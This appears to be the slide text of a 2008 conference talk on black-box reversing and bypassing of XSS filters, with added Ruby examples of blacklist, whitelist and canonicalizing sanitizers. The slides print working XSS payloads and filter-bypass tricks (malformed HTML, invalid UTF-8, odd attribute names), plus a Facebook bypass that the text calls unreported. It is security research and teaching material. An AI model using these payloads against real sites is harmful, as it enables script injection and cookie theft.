Blackbox Reversing of XSS Filters. Alexander Sotirov, alex@sotirov.net, ekoparty 2008
Introduction
• Web applications are the future
• Reversing web apps
○ blackbox reversing
○ very different environment and tools
• Cross-site scripting (XSS)
○ the “strcpy” of web app development
○ reversing and bypassing XSS filters
Overview
• User generated content and Web 2.0
• Implementing XSS filters
• Reversing XSS filters
• XSS in Facebook
Part I
User generated content and Web 2.0
Web 2.0
• User generated content
• APIs
• Mashups
• Aggregation of untrusted content
• Significantly increased attack surface
User generated content
• Text
○ Plaintext
○ Lightweight markup (BBcode, Wikipedia)
○ Limited HTML
○ Full HTML and JavaScript
• Images, sound, video
• Flash
Attacker generated content
• Social networking
○ Samy’s MySpace worm
○ multiple Orkut worms, stealing bank info
• Webmail
○ Hotmail and Yahoo Mail cross-site scripting worm written by SkyLined in 2002
○ many SquirrelMail cross-site scripting bugs
• Blogs
○ hacking WordPress with XSS
Cross site scripting (XSS)
Request:
http://www.example.com/?name=<script>alert('XSS')</script>
Response:
<html><body><p>Hello <script>alert('XSS')</script></p></body></html>
Web security model
Same origin policy
• Prevents scripts from one domain from manipulating documents loaded from other domains
• Cross site scripting allows us to execute arbitrary scripts on a page loaded from another domain
What can XSS do?
• Stealing data from web pages
• Capturing keystrokes on a web page
• Stealing authentication cookies
• Arbitrary HTTP requests with XMLHttpRequest
Part II
Implementing XSS filters
XSS filters
Goal:
• Remove all scripts from untrusted HTML
Challenges:
• Many HTML features that allow scripting
• Proprietary extensions to HTML
• Parsing invalid HTML
• Browser bugs
Features that allow scripting
Script tags:
<script src="http://www.example.com/xss.js">
Event handler attributes:
<body onload="alert('XSS')">
CSS:
<p style="background:url('javascript:alert(1)')">
URLs:
<img src="javascript:alert('XSS')">
Proprietary extensions to HTML
XML data islands (IE)
<xml src="http://www.example.com/xss.xml" id="x"><span datasrc="#x" datafld="c" dataformatas="html">
JavaScript expressions in attribute (NS4)
<p id="&{alert('XSS')}">
Conditional comments (IE)
<!--[if gte IE 4]> <script>alert('XSS')</script><![endif]-->
Parsing invalid HTML
<<scr\0ipt/src=http://xss.com/xss.js></script
○ extra '<' before opening tag
○ NULL byte inside tag name
○ '/' separator between tag and attribute
○ no quotes around attribute value
○ missing '>' in closing tag
Browser behavior is not documented or standardized. IE7 parses this as:
<script src="http://xss.com/xss.js"></script>
Browser bugs
Invalid UTF8 handling in Internet Explorer 6:
<body foo="\xC0" bar=" onload=alert(1);//">
Firefox and IE7:
<body foo="?" bar=" onload=alert(1);//">
IE6:
<body foo="? bar=" onload=alert(1);//">
Attribute parsing in Firefox < 2.0.0.2:
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Implementing XSS filters
• String matching filters
• HTML DOM parsers
• Canonicalization
• Whitelisting
String matching filters
Remove all script tags:
s/<script>//g;
Bypasses:
○ Invalid HTML accepted by browsers
○ Encoding of attribute values and URLs
○ Using the filter against itself: <scr<script>ipt>
○ Incomplete blacklists
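The following is an added example, not code from the talk. It reimplements the slide's `s/<script>//g` filter in Ruby and runs the reflected payload from slide 8 and the "filter against itself" payload through it, then contrasts the blacklist with plain output escaping (`CGI.escapeHTML`) for a field that is supposed to be text anyway. The function and constant names (`strip_script_tags`, `strip_script_tags_until_stable`, `render_greeting`, `PAYLOADS`) are this example's own, and the samples are constructed.

```ruby
require 'cgi'

# Constructed samples: slide 8's reflected payload, slide 18's
# "filter against itself" payload and a simple case variant.
PAYLOADS = {
  plain: "<script>alert('XSS')</script>",
  nested: "<scr<script>ipt>alert('XSS')</script>",
  upper_case: "<SCRIPT>alert('XSS')</SCRIPT>"
}.freeze

# The slide's filter, literally: s/<script>//g in a single, case-sensitive pass.
def strip_script_tags(html)
  html.gsub('<script>', '')
end

# The usual patch: repeat until nothing changes. That closes the nested
# trick, but the filter is still a blacklist, so any spelling it does not
# list goes straight through (slide 18: "incomplete blacklists").
def strip_script_tags_until_stable(html)
  loop do
    stripped = strip_script_tags(html)
    return stripped if stripped == html
    html = stripped
  end
end

# Output encoding: where the field is plain text, as in slide 8's greeting,
# escape every HTML metacharacter instead of hunting for tags; there is
# nothing left for a browser to parse as markup.
def render_greeting(name)
  "<p>Hello #{CGI.escapeHTML(name)}</p>"
end

# Is there still a script start tag in the output? Browsers match tag names
# case-insensitively, so the check does too.
def contains_script_tag?(html)
  html.match?(/<script[\s>]/i)
end

if __FILE__ == $PROGRAM_NAME
  PAYLOADS.each do |label, payload|
    once = strip_script_tags(payload)
    stable = strip_script_tags_until_stable(payload)
    puts "#{label}: one pass -> #{once.inspect} (script left: #{contains_script_tag?(once)})"
    puts "#{label}: until stable -> #{stable.inspect} (script left: #{contains_script_tag?(stable)})"
  end
  puts render_greeting(PAYLOADS[:plain])
end
```

Run it and the single pass turns `<scr<script>ipt>` into a working `<script>` tag, the fixpoint loop fixes that one case and still passes `<SCRIPT>`, while the escaped greeting contains no tag at all. That is the practical reading of the slide: patching a blacklist one bypass at a time never ends, whereas escaping (or a whitelist, for fields that must carry markup) removes the class of problem.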
HTML DOM parsers
<body onload="alert(1)"><script>alert(2)</script><p>Hello</p></body>
Canonicalization
1. Build a DOM tree from the input stream
○ handle invalid UTF8 sequences
2. Apply XSS filters to the DOM tree
3. Output the DOM tree in a canonical form
○ escape special characters
○ add closing tags where necessary
Whitelisting
Blacklisting
○ remove known bad tags and attributes
○ must be 100% complete to be safe
Whitelisting
○ allow only known safe tags and attributes
○ safer than blacklisting
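As an added example (not code from the talk or from any of the filters it discusses), here is the three-step pipeline of slides 19 to 21 in Ruby: tokenize the input into a tree-like stream, apply a tag and attribute whitelist, and emit canonical output with escaped text and every element closed. The tokenizer, the policy in `SAFE_TAGS`, the URL rule in `SAFE_URL` and the constructed inputs in `SAMPLES` are all this example's own assumptions; the tokenizer is deliberately small and does not claim to match any browser, which is exactly the gap slides 15 and 16 are about.

```ruby
require 'cgi'

# Whitelist policy: tag => attributes allowed on it. Every other tag and
# attribute is dropped. (Constructed for this example; a site tunes it.)
SAFE_TAGS = {
  'p' => [], 'b' => [], 'i' => [], 'br' => [],
  'a' => ['href'], 'img' => ['src', 'alt']
}.freeze
VOID_TAGS = %w[br img].freeze
# URL-valued attributes must be relative or use a known-harmless scheme.
SAFE_URL = %r{\A(?:https?:|/|#)}i
# name, "double-quoted", 'single-quoted' or bare value
ATTR_RE = /([^\s="'\/>]+)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/

# Step 1: tokenize into [:text, s], [:open, name, attrs], [:close, name].
# Kept deliberately small; a production filter needs a parser that mirrors
# the browsers it protects, which is the whole point of slides 15 and 16.
def tokenize(html)
  tokens = []
  pos = 0
  while pos < html.length
    lt = html.index('<', pos)
    if lt.nil?
      tokens << [:text, html[pos..]]
      break
    end
    tokens << [:text, html[pos...lt]] if lt > pos
    gt = html.index('>', lt)
    if gt.nil?                              # unterminated tag: keep it as text
      tokens << [:text, html[lt..]]
      break
    end
    inner = html[(lt + 1)...gt]
    if inner.start_with?('/')
      tokens << [:close, inner[1..].strip.downcase]
    else
      name, rest = inner.split(%r{[\s/]+}, 2)
      attrs = {}
      (rest || '').scan(ATTR_RE) { |key, dq, sq, bare| attrs[key.downcase] = dq || sq || bare || '' }
      tokens << [:open, name.to_s.downcase, attrs]
    end
    pos = gt + 1
  end
  tokens
end

# Steps 2 and 3: apply the whitelist to the token stream and emit canonical
# output: lowercase names, double-quoted escaped attribute values, escaped
# text, and every open element closed in order even if the input never did.
def sanitize(html)
  out = +''
  open_tags = []
  tokenize(html).each do |kind, name, attrs|
    case kind
    when :text
      out << CGI.escapeHTML(name)           # for :text the payload is the string itself
    when :open
      next unless SAFE_TAGS.key?(name)      # unknown tag dropped; its text survives as text
      out << "<#{name}"
      attrs.each do |key, value|
        next unless SAFE_TAGS[name].include?(key)
        next if %w[href src].include?(key) && !value.match?(SAFE_URL)
        out << %( #{key}="#{CGI.escapeHTML(value)}")
      end
      out << '>'
      open_tags << name unless VOID_TAGS.include?(name)
    when :close
      next unless open_tags.include?(name)  # stray closing tag dropped
      loop do
        closed = open_tags.pop
        out << "</#{closed}>"
        break if closed == name
      end
    end
  end
  out << "</#{open_tags.pop}>" until open_tags.empty?
  out
end

# Constructed inputs: slide 19's DOM example, an unclosed fragment, a
# javascript: URL (slide 13) and the odd attribute name from slide 33.
SAMPLES = {
  dom: '<body onload="alert(1)"><script>alert(2)</script><p>Hello</p></body>',
  unclosed: '<p>Hi <b>there',
  js_url: %q{<img src="javascript:alert('XSS')" alt="x">},
  odd_name: '<img src="https://example.test/a.png" onload:="alert(1)">'
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each { |label, html| puts "#{label}: #{sanitize(html)}" }
end
```

Two properties of the output matter for the talk's argument. First, the output is canonical: whatever the input looked like, every tag name is lowercase, every attribute is double-quoted and escaped, and every element is closed, so the browser never has to guess. Second, because `onload:` is simply not a whitelisted name, the filter does not need to know that some browser version strips the trailing colon; a whitelist is safe by construction where a blacklist has to predict every parser quirk.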
Part III
Reversing XSS filters
Reversing XSS filters
• Remote web applications
○ no access to source code or binaries
• Fuzzing
○ limited by bandwidth and request latency
○ draws attention
• Blackbox reversing
○ send input and inspect the output
○ build a filter model based on its behavior
Iterative model generation
1. Build an initial model of the filter
2. Generate a test case
3. Send test case and inspect the result
4. Update the model
5. Go to step 2
Example of parser reversing
Test case:
(1..0xFF).each { |x| data << "<p #{x.chr}a=''></p>"}
Results:
○ whitespace regexp
[\x08\t\r\n "'/]+
○ attribute name regexp
[a-zA-Z0-9:-_]+
refltr.rb
• Framework for XSS filter reversing
○ run a set of tests against a web application
○ store the results
○ manual analysis of the output
○ result diffing
• Application modules
○ abstract application specific details
○ sending data, result parsing, error detection
• Test modules
○ test generation functions
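The loop on slide 24, the test case on slide 25 and the module split on slide 26, as an added example rather than refltr.rb itself. The "application module" here is a constructed local stand-in, `TOY_FILTER`, which canonicalizes a `<p>` tag using its own notion of separator and attribute-name characters; the "test module" is `test_case`, slide 25's generator; `classify` and `reverse_model` inspect the output and build the model; `char_class` prints it in the form the slide reports. All of these names are this example's own. A filter author can point the same harness at their own sanitizer, which is the "reimplement the filter and fuzz it locally" idea of slide 27, and compare the resulting character classes with what the browsers they support actually accept.

```ruby
# Constructed stand-in for the remote application ("application module" in
# refltr terms): a canonicalizing filter that re-emits <p> with its attribute,
# recognising only space, tab, CR, LF and '/' as separators and only
# [A-Za-z0-9_:.-] in attribute names. Anything else makes it drop the attribute.
TOY_FILTER = lambda do |html|
  m = html.match(%r{\A<p([ \t\r\n/]+)([A-Za-z0-9_:.-]+)=''></p>\z})
  m ? %(<p #{m[2]}=""></p>) : '<p></p>'
end

# Test generation function ("test module"): slide 25's test case for one byte.
def test_case(byte)
  "<p #{byte.chr}a=''></p>"
end

# One turn of the loop on slide 24: send the test case, inspect the result,
# and record what the filter made of the probed byte.
def classify(app, byte)
  out = app.call(test_case(byte))
  if out.include?(' a=""')
    :whitespace          # the byte separated the tag name from the attribute
  elsif out.include?(%(#{byte.chr}a=""))
    :name_char           # the byte became part of the attribute name
  else
    :rejected            # the filter threw the attribute away
  end
end

# Run all 255 probes and group the bytes by the filter's behaviour.
def reverse_model(app)
  model = Hash.new { |h, k| h[k] = [] }
  (1..0xFF).each { |b| model[classify(app, b)] << b }
  model
end

# Render a byte list as a character class, the way slide 25 reports results.
def char_class(bytes)
  body = bytes.sort.map { |b| b.between?(0x21, 0x7E) ? Regexp.escape(b.chr) : format('\x%02X', b) }.join
  "[#{body}]+"
end

if __FILE__ == $PROGRAM_NAME
  model = reverse_model(TOY_FILTER)
  puts "whitespace regexp:     #{char_class(model[:whitespace])}"
  puts "attribute name regexp: #{char_class(model[:name_char])}"
  puts "rejected bytes:        #{model[:rejected].size}"
end
```

The model comes out as `[\x09\x0A\x0D\x20/]+` for separators and 66 name characters, recovered purely from output, which is why the technique works without source. Against a real deployment the same 255 requests are all the traffic needed for this one question, a fraction of what blind fuzzing costs; the defender's use is to run it before deployment and treat every byte the browser accepts as a separator but the filter does not (slide 15's `/`, for instance, if the filter lacked it) as a bug to fix.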
Using the model
• Grammar based analysis
○ build a grammar for the filter output
○ build a grammar for the browser parser
○ find a valid sentence in both grammars that includes a <script> tag
• Reimplement the filter and fuzz it locally
Part IV
XSS in Facebook
Facebook platform
• Third party applications
○ application pages
○ content in user profiles
○ message and wall post attachments
• FBML
○ HTML with a few restrictions
○ limited style sheet and scripting support
• FBJS
○ sandboxed JavaScript
FBML processing
[Diagram: the browser sends GET /funapp/foo.html to apps.facebook.com, which sends GET /foo.html to funapp.example.com; the application returns FBML and Facebook returns HTML to the browser]
• Facebook serves as a proxy for application content
• FBML processing:
○ special FBML tags are replaced with HTML
○ non-supported HTML tags are removed
○ scripts are sandboxed
Reversing the FBML parser
[Diagram: refltr.rb writes the test case into /var/www on a local apache server; apps.facebook.com fetches it as FBML and the filtered HTML comes back to refltr.rb]
• HTML DOM parser
• Accepts and fixes invalid input
• Canonicalized output
• Whitelist of tags, blacklist of attributes
Facebook XSS
Invalid UTF8 sequences
○ input is parsed as ASCII
○ HTTP response headers specify UTF8 encoding
○ affects only IE6
Code:
<img src="…" foo="\xC0" bar="onload=alert(1);//">
Reported and fixed in February.
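The fix side of this slide, as an added example that is not Facebook's or the talk's code: the bug exists because the filter parses bytes while the browser decodes the declared UTF-8, so step 1 of slide 20 ("handle invalid UTF8 sequences") means decoding the input as the response's charset and replacing every invalid sequence before any tag parsing runs. `RAW` is a constructed input in the shape shown above, and `normalize_utf8`, `attributes` and `filtered_attributes` are this example's own names; the attribute splitter is a minimal stand-in, not a real parser.

```ruby
# Constructed input, after slides 16 and 32: an invalid UTF-8 lead byte (\xC0)
# directly before the closing quote of one attribute, followed by a second
# attribute whose value is an event-handler assignment. Kept as raw bytes,
# which is what a filter that "parses as ASCII" operates on.
RAW = %(<img src="/a.png" foo="\xC0" bar="onload=alert(1);//">).b

# Step 1 of the canonicalization pipeline (slide 20): decode the input with
# the charset the response will declare (UTF-8) and replace every invalid
# sequence with U+FFFD before anything parses it. Once the filter and the
# browser see the same characters, a stray lead byte cannot swallow the
# quote that follows it.
def normalize_utf8(bytes)
  s = bytes.dup.force_encoding(Encoding::UTF_8)
  s.valid_encoding? ? s : s.scrub("\uFFFD")
end

# Minimal attribute splitter (constructed, double-quoted values only):
# enough to show where the attribute boundaries end up.
def attributes(tag)
  tag.scan(/([A-Za-z][A-Za-z0-9_:-]*)="([^"]*)"/).to_h
end

# What the filter sees once it normalizes first.
def filtered_attributes(bytes)
  attributes(normalize_utf8(bytes))
end

if __FILE__ == $PROGRAM_NAME
  puts normalize_utf8(RAW).inspect
  filtered_attributes(RAW).each { |k, v| puts "#{k} = #{v.inspect}" }
end
```

After normalization the tag carries exactly three attributes, `src`, `foo` (now a replacement character) and `bar` (a harmless string value), and the output is a valid UTF-8 string that matches the charset the response header declares. The general rule the slide illustrates is that the filter must operate on the same decoded characters the browser will, so every charset decision (declared encoding, invalid-sequence handling) is made once, before the parser, rather than left for each browser to resolve differently.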
This is where I drop the 0day
Attribute name parsing
○ mismatch between Facebook and Firefox parsers
○ affects only Firefox < 2.0.0.2
Code:
<img src="…" onload:="alert(1)">
Not reported, Facebook is still vulnerable.
Facebook Demo
Part V
Conclusion
Conclusion
• Web 2.0 sites are totally screwed
○ broken web security model
○ undocumented browser behavior
○ no programming language support
• Blackbox reversing
○ the only way to reverse most web apps
○ we need better tools and automation